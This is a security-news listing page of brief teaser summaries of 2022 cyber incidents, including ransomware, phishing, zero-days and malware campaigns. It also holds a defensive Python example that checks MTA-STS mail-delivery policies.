Protergo Content Editor

Clever phishing method bypasses MFA using Microsoft WebView2 apps

A clever, new phishing technique uses Microsoft Edge WebView2 applications to steal victims’ authentication cookies, allowing threat actors to bypass multi-factor authentication when logging into stolen accounts. With the large number of data breaches, remote access trojan attacks, and phishing campaigns, stolen login credentials have become abundant. However, the increasing adoption of multi-factor authentication (MFA) …

Mitel zero-day used by hackers in suspected ransomware attack

Hackers used a zero-day exploit on Linux-based Mitel MiVoice VOIP appliances for initial access in what is believed to be the beginning of a ransomware attack. Mitel VOIP devices are used by critical organizations in various sectors for telephony services and were recently exploited by threat actors for high-volume DDoS amplification attacks. In a new report by CrowdStrike, the company …

Yodel parcel company confirms cyberattack is disrupting delivery

Services for the U.K.-based Yodel delivery service company have been disrupted due to a cyberattack that caused delays in parcel distribution and tracking orders online. The company has not published any details about the incident, such as when it occurred or its nature but implies that customer payment information has not been affected since it …

Thousands of GitHub, AWS, Docker tokens exposed in Travis CI logs

For a second time in less than a year, the Travis CI platform for software development and testing has exposed user data containing authentication tokens that could give access to developers’ accounts on GitHub, Amazon Web Services, and Docker Hub. Researchers at Aqua Security discovered that “tens of thousands of user tokens” are exposed through …

Extortion gang ransoms Shoprite, largest supermarket chain in Africa

Shoprite Holdings, Africa’s largest supermarket chain that operates almost three thousand stores across twelve countries in the continent, has been hit by a ransomware attack. Shoprite is Africa’s largest supermarket chain, with a revenue of $5.8 billion and 149,000 employees. The retailer has 2,943 stores, serving millions of customers in South Africa, Nigeria, Ghana, Madagascar, Mozambique, Namibia, …

Microsoft patches actively exploited Follina Windows zero-day

Microsoft has released security updates with the June 2022 cumulative Windows Updates to address a critical Windows zero-day vulnerability known as Follina and actively exploited in ongoing attacks. “Microsoft strongly recommends that customers install the updates to be fully protected from the vulnerability. Customers whose systems are configured to receive automatic updates do not need …

2 million patients impacted by a cyberattack on a healthcare organization

Massachusetts-based Shields Health Care Group experienced a cyber incident that might have impacted the personal data of 2 million patients. “To date, we have no evidence to indicate that any information from this incident was used to commit identity theft or fraud,” the group said. On 28 March 2022, Shields was alerted about the suspicious …

Potent Emotet Variant Spreads Via Stolen Email Credentials

The dangerous malware appears to be well and truly back in action, sporting new variants and security-dodging behaviors in a wave of recent phishing campaigns. Emotet’s resurgence in April seems to be the signal of a full comeback for what was once dubbed “the most dangerous malware in the world,” with researchers spotting various new …

‘Follina’ Vulnerability Exploited to Deliver Qbot, AsyncRAT, Other Malware

Several malware families are being delivered using the recently disclosed Windows vulnerability identified as Follina and CVE-2022-30190, which remains without an official patch. The vulnerability, related to the Microsoft Support Diagnostic Tool (MSDT), can be exploited for remote code execution using specially crafted documents. While the root cause of the security hole appears to have …

TrojanSMS malware spreading via two malicious Android app stores

The malware spreads through push notifications, alerts, and malvertising on free video streaming, adult sites, and game-hack pages. TrojanSMS, which the company calls SMSFactory, siphons money from victims worldwide, including the US, France, and Spain, by sending premium SMS and making calls to premium-rate phone numbers. “These numbers appear to be part of a conversion …

Researchers Uncover Malware Controlling Thousands of Sites in Parrot TDS Network

The Parrot traffic direction system (TDS) that came to light earlier this year has had a larger impact than previously thought, according to new research. Sucuri, which has been tracking the same campaign since February 2019 under the name “NDSW/NDSX,” said that “the malware was one of the top infections” detected in 2021, accounting for …

Stolen credentials of US universities advertised all over the web

Criminal forums are full of recently stolen admin-level credentials from various US-based colleges and universities. Cybercriminals advertise a wide variety of US education institution credentials for sale, the FBI warned. Some credentials are sold on publicly accessible forums. “This exposure of sensitive credential and network access information, especially privileged user accounts, could lead to subsequent cyberattacks …

Flights cancelled over a ransomware attack on an airline

Indian low-cost airline SpiceJet was forced to cancel several flights, leaving hundreds stranded at the airport. The airline announced it suffered from a ransomware attack on the official company’s account, claiming that the incident impacted SpiceJet’s flight operations. “While our IT team has to a large extent contained and rectified the situation, this has had …

GitHub: Attackers stole login details of 100K npm user accounts

GitHub revealed today that an attacker stole the login details of roughly 100,000 npm accounts during a mid-April security breach with the help of stolen OAuth app tokens issued to Heroku and Travis-CI. The threat actor successfully breached and exfiltrated data from private repositories belonging to dozens of organizations. GitHub disclosed this security breach on April 15, …

DDoS attackers pose as REvil, sparking fear the gang is back

Attackers claim they represent the infamous REvil ransomware gang, considered defunct for months. A recent distributed denial-of-service (DDoS) attack against a hospitality firm displayed a familiar message, as the attackers named themselves REvil. A report by Akamai, a cloud networking provider, says that the company’s client was targeted with a DDoS attack. Interestingly, in the note demanding …

Cyberattack behind Greenland’s healthcare ‘system crash’

Island nation’s health system workers fell back on using phones after a cyberattack knocked out IT systems. The chief governing body of Greenland, Naalakkersuisut, announced that a cyberattack caused IT systems to crash throughout the world’s largest island. To mitigate the issues caused by the attack, operators were forced to restart IT systems and servers that run …

Critical Vulnerability in Premium WordPress Themes Allows for Site Takeover

Privilege escalation flaw discovered in the Jupiter and JupiterX Core Plugin affects more than 90,000 sites. A critical privilege escalation flaw found in two themes used by more than 90,000 WordPress sites can allow threat actors to take over the sites completely, researchers have found. WordFence Threat Intelligence Team researcher Ramuel Gall discovered the flaw, …

Sysrv-K Botnet Targets Windows, Linux

Microsoft researchers say they are tracking a botnet that is leveraging bugs in the Spring Framework and WordPress plugins. Unpatched vulnerabilities in the Spring Framework and WordPress plugins are being exploited by cybercriminals behind the Sysrv botnet to target Linux and Windows systems. The goal, according to researchers, is to infect systems with cryptomining malware. …

Researchers Find Potential Way to Run Malware on iPhone Even When it’s OFF

A first-of-its-kind security analysis of iOS Find My function has identified a novel attack surface that makes it possible to tamper with the firmware and load malware onto a Bluetooth chip that’s executed while an iPhone is “off.” The mechanism takes advantage of the fact that wireless chips related to Bluetooth, Near-field communication (NFC), and …

Threat Actors Use Telegram to Spread ‘Eternity’ Malware-as-a-Service

An account promoting the project—which offers a range of threat activity from info-stealing to crypto-mining to ransomware as individual modules—has more than 500 subscribers. Cybercriminals are promoting a new, modular malware-as-a-service offering that allows would-be attackers to choose from a cornucopia of threats via a Telegram channel that to date has more than 500 subscribers, researchers have …

Novel ‘Nerbian’ Trojan Uses Advanced Anti-Detection Tricks

The stealthy, feature-rich malware has multistage evasion tactics to fly under the radar of security analysis, researchers at Proofpoint have found. A newly discovered and complex remote access trojan (RAT) is spreading via malicious email campaigns using COVID-19 lures and includes numerous features to evade analysis or detection by researchers, Proofpoint has found. Dubbed Nerbian RAT, the …

Another Set of Joker Trojan-Laced Android Apps Resurfaces on Google Play Store

A new set of trojanized apps spread via the Google Play Store has been observed distributing the notorious Joker malware on compromised Android devices. Joker, a repeat offender, refers to a class of harmful apps that are used for billing and SMS fraud, while also performing a number of actions of a malicious hacker’s choice, such as …

Hackers Are Now Hiding Malware in Windows Event Logs

Security researchers have noticed a malicious campaign that used Windows event logs to store malware, a technique that has not been previously documented publicly for attacks in the wild. The method enabled the threat actor behind the attack to plant fileless malware in the file system in an attack filled with techniques and modules designed …

Lincoln College Closed After 157 Years Due to Ransomware Attack

Lincoln College, a liberal-arts school from rural Illinois, says it will close its doors later this month, 157 years since its founding and following a brutal hit on its finances from the COVID-19 pandemic and a recent ransomware attack. This decision was made even harder with the college having survived multiple disasters, including a major …

Cloud Tech Powers the Hybrid-remote Workforce — and Increases Insider Risk

Cybersecurity practitioners are sounding the alarm bells. Amplified by the not-going-away-anytime-soon Great Resignation and the here-to-stay shift to hybrid-remote work models, Insider Risk sees exponential growth. Exponential growth, lagging indicators, flattening the curve — the pandemic forced us all to get familiar with concepts like these. And these same ideas are extremely relevant to how …

‘Hack DHS’ Bug Hunters Find 122 Security Flaws in DHS Systems

The Department of Homeland Security (DHS) today revealed that bug bounty hunters enrolled in its ‘Hack DHS’ bug bounty program have found 122 security vulnerabilities in external DHS systems, 27 of them rated critical severity. DHS awarded a total of $125,600 to over 450 vetted security researchers and ethical hackers, with rewards of up to …

Most Email Security Approaches Fail to Block Common Threats

A full 89 percent of organizations experienced one or more successful email breaches during the previous 12 months, translating into big-time costs. An overwhelming number of security teams believe their email security systems to be ineffective against the most serious inbound threats, including ransomware. That’s according to a survey of business customers using Microsoft 365 …

Hackers steal $655K after picking MetaMask seed from iCloud backup

MetaMask has published a warning for their iOS users about the seeds of cryptocurrency wallets being stored in Apple’s iCloud if app data backup is active. MetaMask is a “hot” cryptocurrency wallet used by over 21 million investors to store their wallet tokens and manage their digital assets. In cryptocurrency lingo, a seed is a secret recovery …

Cisco vulnerability lets hackers craft their own login credentials

Cisco has released a security advisory to warn about a critical vulnerability (CVSS v3 score: 10.0), tracked as CVE-2022-20695, impacting the Wireless LAN Controller (WLC) software. The security flaw allows remote attackers to log in to target devices through the management interface without using a valid password. The bug involves the improper implementation of the …

Menswear Brand Zegna Reveals Ransomware Attack

Accounting materials from the Italy-based luxury fashion house were leaked online by RansomExx because the company refused to pay. High-end Italian fashion house Ermenegildo Zegna revealed on Monday that it was the target of a ransomware attack last August — and that it managed to recover its systems from back-up without paying a ransom. The …

‘Resilient’ gang traded card fraud for ransoms, says report

A cybercriminal group once notorious for digital payment card theft is believed to have switched its focus to ransomware attacks, in a reminder of just how versatile threat actors have become. Crooks thought to be affiliated to the FIN7 group – which shot to notoriety last decade when it used malware to steal millions of …

Hackers breach MailChimp’s internal tools to target crypto customers

Email marketing firm MailChimp disclosed on Sunday that they had been hit by hackers who gained access to internal customer support and account management tools to steal audience data and conduct phishing attacks. Sunday morning, Twitter was abuzz with reports from owners of Trezor hardware cryptocurrency wallets who received phishing notifications claiming that the company suffered a data breach. …

Researchers Uncover New Android Spyware With C2 Server Linked to Turla Hackers

An Android spyware application has been spotted masquerading as a “Process Manager” service to stealthily siphon sensitive information stored in the infected devices. Interestingly, the app — that has the package name “com.remote.app” — establishes contact with a remote command-and-control server, 82.146.35[.]240, which has been previously identified as infrastructure belonging to the Russia-based hacking group …

Apple Rushes Out Patches for 0-Days in MacOS, iOS

The vulnerabilities could allow threat actors to disrupt or access kernel activity and may be under active exploit. Apple rushed out patches for two zero-days affecting macOS and iOS Thursday, both of which are likely under active exploitation and could allow a threat actor to disrupt or access kernel activity. Apple released separate security updates for the bugs …

Spring patches leaked Spring4Shell zero-day RCE vulnerability

Spring released emergency updates to fix the ‘Spring4Shell’ zero-day remote code execution vulnerability, which leaked prematurely online before a patch was released. Yesterday, an exploit for a zero-day remote code execution vulnerability in the Spring Framework dubbed ‘Spring4Shell’ was briefly published on GitHub and then removed. However, as nothing stays hidden on the Internet, the code was …

Crypto Stealing Malware Spreads via Fake Wallet Apps

Researchers have uncovered dozens of trojanized cryptocurrency wallet apps performing malicious activities. The goal of these apps is to steal cryptocurrency funds, especially from Chinese users.

The fake apps operation

ESET researchers have revealed over 40 copycat websites of popular cryptocurrency wallets. These impersonated websites are promoted via ads placed on legitimate sites, along with adverts …

Cyberattackers Target UPS Backup Power Devices in Mission-Critical Environments

The active attacks could result in critical-infrastructure damage, business disruption, lateral movement and more. Cyberattackers are targeting uninterruptible power supply (UPS) devices, which provide battery backup power during power surges and outages. UPS devices are usually used in mission-critical environments, safeguarding critical infrastructure installations and important computer systems and IT equipment, so the stakes are …

Globant confirms hack after Lapsus$ leaks 70GB of stolen data

IT and software consultancy firm Globant has confirmed that they were breached by the Lapsus$ data extortion group, where data consisting of administrator credentials and source code was leaked by the threat actors. As part of the leak, the hacking group released a 70GB archive of data stolen from Globant, describing it as “some customers …

Critical Sophos Firewall vulnerability allows remote code execution

Sophos has fixed a critical vulnerability in its Sophos Firewall product that allows remote code execution (RCE). Tracked as CVE-2022-1040, the authentication bypass vulnerability exists in the User Portal and Webadmin areas of Sophos Firewall.

RCE bug in web administration console

On Friday, Sophos disclosed a critical remote code execution vulnerability impacting Sophos Firewall versions 18.5 MR3 (18.5.3) and earlier that the …

Hive ransomware ports its Linux VMware ESXi encryptor to Rust

The Hive ransomware operation has converted their VMware ESXi Linux encryptor to the Rust programming language and added new features to make it harder for security researchers to snoop on victims’ ransom negotiations. As the enterprise becomes increasingly reliant on virtual machines to save computer resources, consolidate servers, and for easier backups, ransomware gangs are …

CISA adds 66 vulnerabilities to list of bugs exploited in attacks

The Cybersecurity and Infrastructure Security Agency (CISA) has added a massive set of 66 actively exploited vulnerabilities to its catalog of ‘Known Exploited Vulnerabilities.’ These flaws have been observed in real cyberattacks against organizations, so they are published to raise awareness among system administrators and serve as official advisories for applying the corresponding security updates. …

Google Chrome Zero-Day Bugs Exploited Weeks Ahead of Patch

Two separate campaigns from different threat actors targeted users with the same exploit kit for more than a month before the company fixed an RCE flaw found in February. North Korean threat actors exploited a remote code execution (RCE) zero-day vulnerability in Google’s Chrome web browser weeks before the bug was discovered and patched, according …

Microsoft and Okta Confirm Breach by LAPSUS$ Extortion Group

Microsoft on Tuesday confirmed that the LAPSUS$ extortion-focused hacking crew had gained “limited access” to its systems, as authentication services provider Okta revealed that nearly 2.5% of its customers have been potentially impacted in the wake of the breach. “No customer code or data was involved in the observed activities,” Microsoft’s Threat Intelligence Center (MSTIC) said, adding …

Windows zero-day flaw giving admin rights gets an unofficial patch, again

A Windows local privilege escalation zero-day vulnerability that Microsoft has failed to fully address for several months now allows users to gain administrative privileges in Windows 10, Windows 11, and Windows Server. The locally exploited vulnerability in the Windows User Profile Service is tracked as CVE-2021-34484 and was given a CVSS v3 score of 7.8. While …

Android password-stealing malware infects 100,000 Google Play users

A malicious Android app that steals Facebook credentials has been installed over 100,000 times via the Google Play Store, with the app still available to download. The Android malware is disguised as a cartoonifier app called ‘Craftsart Cartoon Photo Tools,’ allowing users to upload an image and convert it into a cartoon rendering. Over the …

Unsecured Microsoft SQL, MySQL servers hit by Gh0stCringe malware

Hackers target poorly secured Microsoft SQL and MySQL database servers to deploy the Gh0stCringe remote access trojans on vulnerable devices. Gh0stCringe, aka CirenegRAT, is a variant of Gh0st RAT malware that was most recently deployed in 2020 Chinese cyber-espionage operations but dates as far back as 2018. In a new report today by cybersecurity firm AhnLab, researchers …

Hackers Target Bank Networks with new Rootkit to Steal Money from ATM Machines

A financially motivated threat actor has been observed deploying a previously unknown rootkit targeting Oracle Solaris systems with the goal of compromising Automatic Teller Machine (ATM) switching networks and carrying out unauthorized cash withdrawals at different banks using fraudulent cards. Threat intelligence and incident response firm Mandiant is tracking the cluster under the moniker UNC2891, …

Google Uncovers ‘Initial Access Broker’ Working with Conti Ransomware Gang

Google’s Threat Analysis Group (TAG) took the wraps off a new initial access broker that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations. Dubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform (CVE-2021-40444) …

Phony Instagram ‘Support Staff’ Emails Hit Insurance Company

The phishing scam tried to steal login credentials by threatening account shutdown, due to users having purportedly shared “fake content.” A phishing campaign used the guise of Instagram technical support to steal login credentials from employees of a prominent U.S. life insurance company headquartered in New York, researchers have revealed. According to a report published on Wednesday, …

Pandora Ransomware Hits Giant Automotive Supplier Denso

Denso confirmed that cybercriminals leaked stolen, classified information from the Japan-based car-components manufacturer after an attack on one of its offices in Germany. A multibillion-dollar supplier to key automotive companies like Toyota, Mercedes-Benz and Ford confirmed Monday that it was the target of a cyberattack over the weekend – confirmation that came after the Pandora …

Cyberattacks Against Israeli Government Sites: ‘Largest in the Country’s History’

DDoS attacks against Israeli telecom companies took down government sites, sparking a temporary state of emergency. Israel’s National Cyber Directorate confirmed in a tweet on Monday that a denial-of-service (DDoS) attack against a telecommunications provider took down several government sites, as well as others not affiliated with the government. The incident led to the Directorate …

Ubisoft confirms ‘cyber security incident’, resets staff passwords

Video game developer Ubisoft has confirmed that it suffered a ‘cyber security incident’ that caused disruption to its games, systems, and services. The announcement comes after multiple Ubisoft users had reported issues last week accessing their Ubisoft service. Data extortion group LAPSUS$, who has claimed responsibility for hacking Samsung, NVIDIA, and Mercado Libre thus far, appears to be behind …

Bridgestone Americas confirms ransomware attack, LockBit leaks data

A cyberattack on Bridgestone Americas, one of the largest manufacturers of tires in the world, has been claimed by the LockBit ransomware gang. The threat actor announced that they will leak all data stolen from the company and launched a countdown timer, which is currently at less than three hours.

Timer activated

Bridgestone has tens …

Emotet Botnet’s Latest Resurgence Spreads to Over 100,000 Computers

The insidious Emotet botnet, which staged a return in November 2021 after a 10-month-long hiatus, is once again exhibiting signs of steady growth, amassing a swarm of over 100,000 infected hosts for perpetrating its malicious activities. “While Emotet has not yet attained the same scale it once had, the botnet is showing a strong resurgence …

RuRAT Campaign Uses Innovative Lure to Target Potential Victims

A malicious campaign is installing RuRAT malware that provides remote access to compromised devices. The attackers are impersonating a venture capital firm wanting to invest money or purchase the victim’s site. Recently, BleepingComputer received a spear-phishing email from an IP address belonging to a U.K. virtual server company. The email impersonated a venture capitalist interested in buying …

European Officials Aiding the Ukrainian Refugee Movement are Under Attack

A spear-phishing campaign has been identified targeting European government personnel helping Ukrainian refugees. The campaign is still ongoing and is being tracked as Asylum Ambuscade. According to Proofpoint, a nation-state actor is believed to have compromised a Ukrainian armed service member’s email account to target European government personnel aiding refugees fleeing Ukraine. The phishing messages included …

Adafruit discloses data leak from ex-employee’s GitHub repo

Adafruit has disclosed a data leak that occurred due to a publicly-viewable GitHub repository. The company suspects this could have allowed “unauthorized access” to information about certain users on or before 2019. Based in New York City, Adafruit is a producer of open-source hardware components since 2005. The company designs, manufactures, and sells electronics products, tools, and accessories. …

Mozilla Firefox 97.0.2 fixes two actively exploited zero-day bugs

Mozilla has released Firefox 97.0.2, Firefox ESR 91.6.1, Firefox for Android 97.3.0, and Focus 97.3.0 to fix two critical zero-day vulnerabilities actively exploited in attacks. Both zero-day vulnerabilities are “Use-after-free” bugs, which is when a program tries to use memory that has been previously cleared. When threat actors exploit this type of bug, it can …

Hackers leak 190GB of alleged Samsung data, source code

The Lapsus$ data extortion group leaked today a huge collection of confidential data they claim to be from Samsung Electronics, the South Korean consumer electronics giant. The leak comes less than a week after Lapsus$ released a 20GB document archive from 1TB of data stolen from GPU designer Nvidia.

Gang teases Samsung data leak

In a …

NVIDIA data breach exposed credentials of over 71,000 employees

More than 71,000 employee credentials were stolen and leaked online following a data breach suffered by US chipmaker giant Nvidia last month. The Have I Been Pwned data breach notification service has added data belonging to 71,335 compromised accounts to its database on Wednesday. Have I Been Pwned says the stolen data contains “email addresses …

Ukraine says local govt sites hacked to push fake capitulation news

The Security Service of Ukraine (SSU) said today “enemy” hackers are using compromised local government and regional authorities’ websites to push rumors that Ukraine surrendered and signed a peace treaty with Russia. SSU revealed this in a tweet further distributed by Ukraine’s State Service for Special Communication and Information Protection (SSSCIP) to Ukrainian Twitter users. “WARNING! ANOTHER FAKE! The enemy has broken into …

Cisco Patches Critical Vulnerabilities in Expressway, TelePresence VCS Products

Cisco this week announced patches that address two critical vulnerabilities in its Expressway Series and TelePresence Video Communication Server (VCS) unified communications products. Tracked as CVE-2022-20754 and CVE-2022-20755 and carrying a CVSS score of 9.0, the two security holes can be exploited by a remote, authenticated attacker to write files or execute code …

Cisco Patches Critical Vulnerabilities in Expressway, TelePresence VCS Products Read More »

Conti Ransomware Decryptor, TrickBot Source Code Leaked

The decryptor spilled by ContiLeaks won’t work with recent victims. Conti couldn’t care less: It’s still operating just fine. Still, the dump is a bouquet’s worth of intel. The pro-Ukraine member of the Conti ransomware gang who promised to eviscerate the extortionists after they pledged support for the Russian government has spilled yet more Conti guts: The …

Conti Ransomware Decryptor, TrickBot Source Code Leaked Read More »

TeaBot Trojan Haunts Google Play Store, Again

Malicious Google Play apps have slipped past Google Play’s app vetting by hiding trojans in software updates delivered after installation. The TeaBot banking trojan – also known as “Anatsa” – has been spotted on the Google Play store, researchers from Cleafy have discovered. The malware – designed to intercept SMS messages and login credentials from unwitting users – affected users of “more than …

TeaBot Trojan Haunts Google Play Store, Again Read More »

RCE Bugs in Hugely Popular VoIP Apps: Patch Now!

The flaws are in the ubiquitous open-source PJSIP multimedia communication library, used by the Asterisk PBX toolkit that’s found in a massive number of VoIP implementations. Some of the world’s most popular communication apps are using an open-source library riddled with newfound security holes. One thing this open-source, flawed library shares with the Apache Log4J …

RCE Bugs in Hugely Popular VoIP Apps: Patch Now! Read More »

Toyota to Close Japan Plants After Suspected Cyberattack

The plants will shut down on Tuesday, halting about a third of the company’s global production. Toyota doesn’t know how long the 14 plants will be unplugged. What was potentially a cyberattack hit one of Toyota’s parts suppliers, causing the company to move to shut down about a third of the company’s global production tomorrow, …

Toyota to Close Japan Plants After Suspected Cyberattack Read More »

Microsoft Exchange Bugs Exploited by ‘Cuba’ Ransomware Gang

The ransomware gang known as Cuba is increasingly shifting to exploiting Exchange bugs – including crooks’ favorites, ProxyShell and ProxyLogon – as initial infection vectors. The ransomware gang known as “Cuba” is increasingly shifting to exploiting Microsoft Exchange vulnerabilities – including ProxyShell and ProxyLogon – as initial infection vectors, researchers have found. The group has likely been prying open …

Microsoft Exchange Bugs Exploited by ‘Cuba’ Ransomware Gang Read More »

New Critical RCE Bug Found in Adobe Commerce, Magento

Adobe updated its recent out-of-band security advisory to add another critical bug, while researchers put out a PoC for the one it emergency-fixed last weekend. Yet another zero-day bug has been discovered in the Magento Open Source and Adobe Commerce platforms, while researchers have created a working proof-of-concept (PoC) exploit for the recently patched CVE-2022-24086 …

New Critical RCE Bug Found in Adobe Commerce, Magento Read More »

Conti ransomware gang takes over TrickBot malware operation

After four years of activity and numerous takedown attempts, the death knell of TrickBot has sounded as its top members move under new management, the Conti ransomware syndicate, who plan to replace it with the stealthier BazarBackdoor malware. TrickBot is a Windows malware platform that uses multiple modules for various malicious activities, including information stealing, …

Conti ransomware gang takes over TrickBot malware operation Read More »

Microsoft Teams Targeted With Takeover Trojans

Threat actors are infiltrating the increasingly popular collaboration app to attach malicious files to chat threads that drop system-hijacking malware. Threat actors are targeting Microsoft Teams users by planting malicious documents in chat threads that execute Trojans that ultimately can take over end-user machines, researchers have found. In January, researchers at Avanan, a Check Point …

Microsoft Teams Targeted With Takeover Trojans Read More »

Critical MQTT-Related Bugs Open Industrial Networks to RCE Via Moxa

A collection of five security vulnerabilities with a collective CVSS score of 10 out of 10 threaten critical infrastructure environments that use Moxa MXview. Critical security vulnerabilities in Moxa’s MXview web-based network management system open the door to an unauthenticated remote code execution (RCE) as SYSTEM on any unpatched MXview server, researchers warned this week. …

Critical MQTT-Related Bugs Open Industrial Networks to RCE Via Moxa Read More »

Cyber-attack at Vodafone Portugal knocks mobile network services offline

A “deliberate and malicious” cyber-attack targeting Vodafone Portugal knocked mobile networks offline across the country this week. The incident, which started on Monday evening (February 7), suspended 4G and 5G networks for customers, as well as digital TV and SMS services. Vodafone said it has seen “no evidence” that customer data has been accessed or compromised due …

Cyber-attack at Vodafone Portugal knocks mobile network services offline Read More »

Fake Windows 11 upgrade installers infect you with RedLine malware

Threat actors have started distributing fake Windows 11 upgrade installers to users of Windows 10, tricking them into downloading and executing RedLine stealer malware. The timing of the attacks coincides with the moment that Microsoft announced Windows 11’s broad deployment phase, so the attackers were well-prepared for this move and waited for the right moment to maximize …

Fake Windows 11 upgrade installers infect you with RedLine malware Read More »

Swissport ransomware attack delays flights, disrupts operations

Aviation services company Swissport International has disclosed a ransomware attack that has impacted its IT infrastructure and services, causing flights to suffer delays. The Swiss company provides services for cargo handling, security, maintenance, cleaning, and lounge hospitality for 310 airports in 50 countries. It handles 282 million passengers and 4.8 million tons of cargo every year, …

Swissport ransomware attack delays flights, disrupts operations Read More »

Critical Cisco Bugs Open VPN Routers to Cyberattacks

The company’s RV line of small-business routers contains 15 different security vulnerabilities, some unpatched, that could enable everything from RCE to corporate network access and denial-of-service – and many have exploits circulating. UPDATE Critical security vulnerabilities in Cisco’s Small Business RV Series routers could allow privilege escalation, remote code execution (RCE) with root privileges on …

Critical Cisco Bugs Open VPN Routers to Cyberattacks Read More »

Office 365 boosts email security against MITM, downgrade attacks

Microsoft has added SMTP MTA Strict Transport Security (MTA-STS) support to Exchange Online to ensure Office 365 customers’ email communication integrity and security. Redmond first announced MTA-STS’ introduction in September 2020, after revealing that it was also working on adding inbound and outbound support for DNSSEC (Domain Name System Security Extensions) and DANE for SMTP (DNS-based Authentication of Named Entities). “We have been validating …

Office 365 boosts email security against MITM, downgrade attacks Read More »
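MTA-STS closes the gap the item above describes: a sending MTA that has cached a domain’s policy refuses to deliver when STARTTLS is stripped (downgrade), when the certificate does not validate, or when DNS has been tampered with to point at an MX that the policy does not list. The following Python is an added example written for this page, not Microsoft’s or Exchange Online’s implementation; the policy text, MX hostnames and TLS outcomes are constructed. A real sender discovers the policy through the `_mta-sts.<domain>` TXT record, fetches it over HTTPS from `mta-sts.<domain>/.well-known/mta-sts.txt`, and caches it for `max_age` seconds.

```python
"""Added example (not Microsoft's code): how a sending MTA applies an MTA-STS
policy (RFC 8461) to refuse downgraded or misdirected delivery.
The policy, MX names and TLS results below are constructed for illustration."""
from dataclasses import dataclass

# Constructed policy, as it would be served at
# https://mta-sts.example.com/.well-known/mta-sts.txt
SAMPLE_POLICY = """\
version: STSv1
mode: enforce
mx: mail.example.com
mx: *.example.net
max_age: 604800
"""


@dataclass
class Policy:
    mode: str          # enforce | testing | none
    mx: list           # allowed MX hostnames or *.domain patterns
    max_age: int       # seconds the sender may cache this policy


def parse_policy(text):
    """Parse the key: value policy body. Unknown keys are ignored, as RFC 8461
    requires, so future extensions do not break senders."""
    fields, mx = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed policy line: {raw!r}")
        key, value = key.strip().lower(), value.strip()
        if key == "mx":
            mx.append(value.lower().rstrip("."))
        else:
            fields[key] = value
    if fields.get("version") != "STSv1":
        raise ValueError("missing or unsupported version")
    mode = fields.get("mode")
    if mode not in ("enforce", "testing", "none"):
        raise ValueError(f"invalid mode: {mode!r}")
    if mode != "none" and not mx:
        raise ValueError("enforce/testing policies must list at least one mx")
    try:
        max_age = int(fields["max_age"])
    except (KeyError, ValueError):
        raise ValueError("max_age must be present and an integer") from None
    return Policy(mode, mx, max_age)


def mx_matches(pattern, host):
    """'*.example.net' matches exactly one leftmost label (mx1.example.net),
    not example.net itself and not deeper names (a.b.example.net)."""
    host = host.lower().rstrip(".")
    if pattern.startswith("*."):
        suffix = pattern[1:]                      # ".example.net"
        if not host.endswith(suffix):
            return False
        label = host[: -len(suffix)]
        return bool(label) and "." not in label
    return host == pattern


def delivery_decision(policy, mx_host, tls_validated):
    """Decide whether to hand mail to mx_host.

    tls_validated means STARTTLS was negotiated and the server certificate
    chained to a trusted CA and named mx_host. A stripped STARTTLS (downgrade)
    or an attacker-substituted MX record makes this False or fails the mx
    check, which is exactly what MTA-STS is meant to catch."""
    if policy.mode == "none":
        return True, "mode none: opportunistic TLS only"
    allowed = any(mx_matches(p, mx_host) for p in policy.mx)
    if allowed and tls_validated:
        return True, "MX listed in policy and TLS validated"
    problem = "MX not in policy" if not allowed else "TLS missing, downgraded or unvalidated"
    if policy.mode == "testing":
        return True, f"mode testing: delivered, but would report '{problem}' via TLSRPT"
    return False, f"mode enforce: delivery refused, {problem}"
```

The `testing` branch is the rollout path an operator uses before switching to `enforce`: mail still flows, and failures are reported through TLSRPT so misconfigured MX names or certificates are found without bouncing legitimate mail.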

Wormhole cryptocurrency platform hacked to steal $326 million

Hackers have exploited a vulnerability in the Wormhole cross-chain crypto platform to steal $326 million in cryptocurrency. Wormhole is a platform that allows users to transfer cryptocurrency across different blockchains. It does this by locking the original token in a smart contract and then minting a wrapped version of the stored token that can be transferred …

Wormhole cryptocurrency platform hacked to steal $326 million Read More »

KP Snacks Left with Crumbs After Ransomware Attack

The Conti gang strikes again, disrupting the nom-merchant’s supply chain and threatening supermarket shelves that could stay empty for weeks. KP Snacks, maker of the high-end Tyrrell’s and Popchips potato-chip brands, has suffered a ransomware attack that it said could affect deliveries to supermarkets through the end of March – at the earliest. The British …

KP Snacks Left with Crumbs After Ransomware Attack Read More »

Windows vulnerability with new public exploits lets you become admin

A security researcher has publicly disclosed an exploit for a Windows local privilege elevation vulnerability that allows anyone to gain admin privileges in Windows 10. Using this vulnerability, threat actors with limited access to a compromised device can easily elevate their privileges to help spread laterally within the network, create new administrative users, or perform …

Windows vulnerability with new public exploits lets you become admin Read More »

Zerodium Spikes Payout for Zero-Click Outlook Zero-Days

The sweetened deal came on the same day that Trustwave SpiderLabs published a new way to bypass Outlook security to deliver malicious links to victims. Zerodium has jacked up its offering price for Microsoft Outlook zero-day exploits. Act fast if you have the goods and the moral equanimity, to make up to $400,000 for a …

Zerodium Spikes Payout for Zero-Click Outlook Zero-Days Read More »

Conti, DeadBolt Ransomwares Target Delta, QNAP

QNAP had to push out an unexpected (and not entirely welcome) NAS device update, and Delta Electronics’ network has been crippled. Two Taiwanese companies were affected by separate ransomware incidents this week, forcing one to scramble to restore crippled systems and another to push out an emergency update to mitigate attacks on its customers. Delta …

Conti, DeadBolt Ransomwares Target Delta, QNAP Read More »

2FA App Loaded with Banking Trojan Infests 10K Victims via Google Play

The Vultur trojan steals bank credentials but asks for permissions to do far more damage down the line. After remaining available for more than two weeks, a malicious two-factor authentication (2FA) application has been removed from Google Play — but not before it was downloaded more than 10,000 times. The app, which is fully functional …

2FA App Loaded with Banking Trojan Infests 10K Victims via Google Play Read More »

Crypto.com confirms 483 accounts hacked, $34 million withdrawn

Crypto.com has confirmed that a multi-million dollar cyber attack led to the compromise of around 400 of its customer accounts, although the company’s CEO stresses that customer funds are not at risk. By daily trading volume, Crypto.com is reportedly the world’s third-largest cryptocurrency trading platform, “on a mission to accelerate the world’s transition to cryptocurrency.” Crypto.com CEO: 400 …

Crypto.com confirms 483 accounts hacked, $34 million withdrawn Read More »

DHL dethrones Microsoft as most imitated brand in phishing attacks

